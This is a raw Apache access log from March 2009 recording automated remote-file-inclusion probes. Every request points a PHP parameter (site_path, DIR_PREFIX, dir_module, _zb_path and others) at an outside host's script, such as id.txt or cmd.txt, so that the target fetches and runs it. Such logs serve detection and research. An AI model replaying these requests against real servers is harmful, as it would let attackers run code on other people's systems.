209.128.67.34 - - [10/Mar/2009:19:05:11 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 314 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:05:11 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:05:12 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 314 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:05:12 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.53"
64.118.82.22 - - [10/Mar/2009:19:17:00 -0500] "GET /logs//?DIR_PREFIX=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 200 181180 "-""libwww-perl/5.810"
64.118.82.22 - - [10/Mar/2009:19:17:01 -0500] "GET //?DIR_PREFIX=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
85.18.117.101 - - [10/Mar/2009:19:17:06 -0500] "GET //include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.18.117.101 - - [10/Mar/2009:19:18:44 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.18.117.101 - - [10/Mar/2009:19:18:44 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:19:19:11 -0500] "GET //include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:19:19:11 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:19:19:11 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
64.118.82.22 - - [10/Mar/2009:19:19:31 -0500] "GET /logs//?DIR_PREFIX=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 200 181180 "-""libwww-perl/5.810"
64.118.82.22 - - [10/Mar/2009:19:19:31 -0500] "GET //?DIR_PREFIX=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
85.18.117.101 - - [10/Mar/2009:19:19:35 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.18.117.101 - - [10/Mar/2009:19:19:35 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.18.117.101 - - [10/Mar/2009:19:19:40 -0500] "GET //include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:19:20:30 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:19:20:30 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:19:20:30 -0500] "GET //include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:19:22:23 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:19:22:23 -0500] "GET //include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:19:22:23 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:19:23:00 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:19:23:00 -0500] "GET //include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:19:23:00 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
64.118.82.22 - - [10/Mar/2009:19:23:37 -0500] "GET /logs/environment.php?DIR_PREFIX=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
64.118.82.22 - - [10/Mar/2009:19:23:38 -0500] "GET /environment.php?DIR_PREFIX=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.128.67.34 - - [10/Mar/2009:19:50:01 -0500] "GET /logs//modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:01 -0500] "GET /logs//modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:01 -0500] "GET //modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:01 -0500] "GET //modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:39 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 305 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:39 -0500] "GET //modules/xfsection/modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 300 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:41 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 305 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:19:50:41 -0500] "GET //modules/xfsection/modify.php?dir_module=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 300 "-""libwww-perl/5.53"
62.44.70.253 - - [10/Mar/2009:20:05:16 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:20:05:17 -0500] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:20:05:17 -0500] "GET /logs/access_log.1227657600///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.128.67.34 - - [10/Mar/2009:20:05:20 -0500] "GET //modules/xfsection/modify.php?dir_module=http://gumansin.com/id.txt?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
209.128.67.34 - - [10/Mar/2009:20:05:20 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://gumansin.com/id.txt?? HTTP/1.0" 404 305 "-""Mozilla/5.0"
209.128.67.34 - - [10/Mar/2009:20:05:21 -0500] "GET /logs/access_log.1234656000//modules/xfsection/modify.php?dir_module=http://gumansin.com/id.txt?? HTTP/1.0" 404 327 "-""Mozilla/5.0"
209.128.67.34 - - [10/Mar/2009:20:05:31 -0500] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://gumansin.com/id.txt?? HTTP/1.0" 404 327 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:20:05:59 -0500] "GET /logs/access_log.1228348800///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.231.24.164 - - [10/Mar/2009:20:06:38 -0500] "GET /logs/access_log.1233014400//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.231.24.164 - - [10/Mar/2009:20:06:38 -0500] "GET //include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.231.24.164 - - [10/Mar/2009:20:06:40 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.231.24.164 - - [10/Mar/2009:20:06:43 -0500] "GET /logs/access_log.1232928000//include/bbs.lib.inc.php?site_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.15.48.60 - - [10/Mar/2009:20:13:54 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
67.15.48.60 - - [10/Mar/2009:20:13:54 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
78.47.171.210 - - [10/Mar/2009:20:22:17 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.the-urbs.de//privat/showit/photos/weiss/%20%20%20%20%20/idv3.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:22:17 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.the-urbs.de//privat/showit/photos/weiss/%20%20%20%20%20/idv3.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:23:40 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=./id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:23:42 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=./id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:25:58 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=./alb.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:25:58 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=./alb.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:35:19 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=./3.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.47.171.210 - - [10/Mar/2009:20:35:20 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=./3.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:20:38:45 -0500] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:20:38:45 -0500] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:20:39:54 -0500] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:20:39:54 -0500] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
69.72.232.122 - - [10/Mar/2009:20:58:20 -0500] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
69.72.232.122 - - [10/Mar/2009:20:58:20 -0500] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.825"
124.34.5.88 - - [10/Mar/2009:20:59:44 -0500] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
124.34.5.88 - - [10/Mar/2009:20:59:45 -0500] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.0" 404 285 "-""libwww-perl/5.53"
87.249.116.188 - - [10/Mar/2009:21:12:29 -0500] "GET /logs/access_log.1232755200//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
87.249.116.188 - - [10/Mar/2009:21:12:29 -0500] "GET //?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
87.249.116.188 - - [10/Mar/2009:21:12:30 -0500] "GET /logs//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 181180 "-""libwww-perl/5.79"
87.249.116.188 - - [10/Mar/2009:21:12:46 -0500] "GET /logs/access_log.1230681600//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
74.205.119.226 - - [10/Mar/2009:21:13:21 -0500] "GET //include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.205.119.226 - - [10/Mar/2009:21:13:21 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.205.119.226 - - [10/Mar/2009:21:13:21 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
148.245.102.115 - - [10/Mar/2009:21:13:22 -0500] "GET /logs/access_log.1234396800//?DIR_PREFIX=http://c.frey.free.fr/r/editor/id1.txt%0D? HTTP/1.1" 404 311 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
148.245.102.115 - - [10/Mar/2009:21:13:22 -0500] "GET //?DIR_PREFIX=http://c.frey.free.fr/r/editor/id1.txt%0D? HTTP/1.1" 200 3245 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
74.205.119.226 - - [10/Mar/2009:21:13:26 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
148.245.102.115 - - [10/Mar/2009:21:13:41 -0500] "GET /logs//?DIR_PREFIX=http://c.frey.free.fr/r/editor/id1.txt%0D? HTTP/1.1" 200 181180 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
87.249.116.188 - - [10/Mar/2009:21:13:48 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
74.205.119.226 - - [10/Mar/2009:21:15:11 -0500] "GET //include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.205.119.226 - - [10/Mar/2009:21:15:11 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.205.119.226 - - [10/Mar/2009:21:15:11 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.205.119.226 - - [10/Mar/2009:21:15:18 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:15:30 -0500] "GET //include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:15:30 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:15:30 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:15:36 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
148.245.102.115 - - [10/Mar/2009:21:18:29 -0500] "GET //?DIR_PREFIX=http://c.frey.free.fr/r/editor/id1.txt%0D? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
148.245.102.115 - - [10/Mar/2009:21:19:40 -0500] "GET /logs/access_log.1234224000//?DIR_PREFIX=http://c.frey.free.fr/r/editor/id1.txt%0D? HTTP/1.1" 404 311 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
148.245.102.115 - - [10/Mar/2009:21:19:40 -0500] "GET /logs/access_log.1234396800//?DIR_PREFIX=http://c.frey.free.fr/r/editor/id1.txt%0D? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.91.201.31 - - [10/Mar/2009:21:19:59 -0500] "GET //include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:19:59 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:19:59 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [10/Mar/2009:21:20:04 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.48.146.79 - - [10/Mar/2009:21:20:35 -0500] "GET //?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 3245 "-""libwww-perl/5.815"
210.48.146.79 - - [10/Mar/2009:21:20:38 -0500] "GET /logs/access_log.1231286400//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.815"
210.48.146.79 - - [10/Mar/2009:21:20:40 -0500] "GET /logs//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 36689 "-""libwww-perl/5.815"
62.44.70.253 - - [10/Mar/2009:21:21:14 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:21:21:14 -0500] "GET //include/lib.inc.php?site_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:21:21:14 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:21:21:24 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
210.48.146.79 - - [10/Mar/2009:21:22:06 -0500] "GET /logs/access_log.1231804800//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.815"
77.93.208.64 - - [10/Mar/2009:21:24:15 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:21:24:15 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:21:24:24 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:21:24:24 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
148.245.102.115 - - [10/Mar/2009:21:30:02 -0500] "GET //?DIR_PREFIX=http://c.frey.free.fr/r/module/INI/id.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
148.245.102.115 - - [10/Mar/2009:21:30:30 -0500] "GET /logs//?DIR_PREFIX=http://c.frey.free.fr/r/module/INI/id.txt?%0D?? HTTP/1.1" 200 181180 "-""libwww-perl/5.805"
210.48.146.79 - - [10/Mar/2009:21:31:06 -0500] "GET /logs/access_log.1232755200//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.815"
210.48.146.79 - - [10/Mar/2009:21:31:06 -0500] "GET //?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 3245 "-""libwww-perl/5.815"
168.167.180.47 - - [10/Mar/2009:21:31:19 -0500] "GET /logs/access_log.1231286400//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
210.48.146.79 - - [10/Mar/2009:21:31:25 -0500] "GET /logs//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 181180 "-""libwww-perl/5.815"
168.167.180.47 - - [10/Mar/2009:21:32:12 -0500] "GET //?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
168.167.180.47 - - [10/Mar/2009:21:32:24 -0500] "GET /logs//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 200 181180 "-""libwww-perl/5.805"
168.167.180.47 - - [10/Mar/2009:21:33:16 -0500] "GET /logs/access_log.1231804800//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
210.48.146.79 - - [10/Mar/2009:21:34:31 -0500] "GET /logs/access_log.1231545600//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.815"
140.130.101.5 - - [10/Mar/2009:21:36:04 -0500] "GET //include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:21:36:04 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:21:36:04 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
140.130.101.5 - - [10/Mar/2009:21:36:15 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.48.146.79 - - [10/Mar/2009:21:38:15 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.815"
209.128.67.34 - - [10/Mar/2009:21:39:22 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:21:39:22 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:21:39:22 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
209.128.67.34 - - [10/Mar/2009:21:39:22 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hags.gov.cn/id.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
210.48.146.79 - - [10/Mar/2009:21:42:08 -0500] "GET /logs/access_log.1230681600//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.815"
77.93.208.64 - - [10/Mar/2009:21:44:01 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:21:44:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:21:44:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:21:44:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
